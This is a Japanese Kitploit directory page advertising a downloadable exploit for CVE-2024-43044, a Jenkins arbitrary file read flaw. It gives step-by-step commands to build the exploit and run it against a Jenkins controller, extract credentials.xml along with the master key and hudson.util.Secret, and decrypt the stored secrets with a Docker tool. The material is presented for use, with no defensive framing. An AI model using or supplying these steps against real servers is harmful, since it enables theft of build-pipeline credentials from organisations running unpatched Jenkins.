Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-43044-jenkins-creds — CVE-2024-43044 のエクスプロイト。Jenkins コントローラから任意のファイル読み取りを可能にし、秘密鍵を使用して credentials.xml を抽出および復号化します。 | Kitploit
ツール/GitHubGitHub/dacc4/cve-2024-43044-jenkins-creds
暗号化/復号化ツール脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubdacc4/cve-2024-43044-jenkins-creds

CVE-2024-43044-jenkins-creds

CVE-2024-43044 のエクスプロイト。Jenkins コントローラから任意のファイル読み取りを可能にし、秘密鍵を使用して credentials.xml を抽出および復号化します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
41年前未レビュー

はじめに

これはCVE-2024-43044のエクスプロイトです。この脆弱性は任意のファイル読み取りを引き起こし、エージェントがコントローラーからファイルを取得できるようにします。

このエクスプロイトは、脆弱性を利用して credentials.xml ファイルを読み取り、それを復号するための秘密鍵を取得します。

初期コード : https://github.com/convisolabs/CVE-2024-43044-jenkins 元の解説記事 : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

エクスプロイトのビルド

root@kitploit:~
mvn package

エクスプロイトの実行

root@kitploit:~
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>

credentials.xml を復号する

root@kitploit:~
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

テスト

次のようにdockerを使って脆弱性のあるバージョンでテストできます。

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

Jenkinsが実行されたら、エージェントをセットアップしてください。

ツールをダウンロード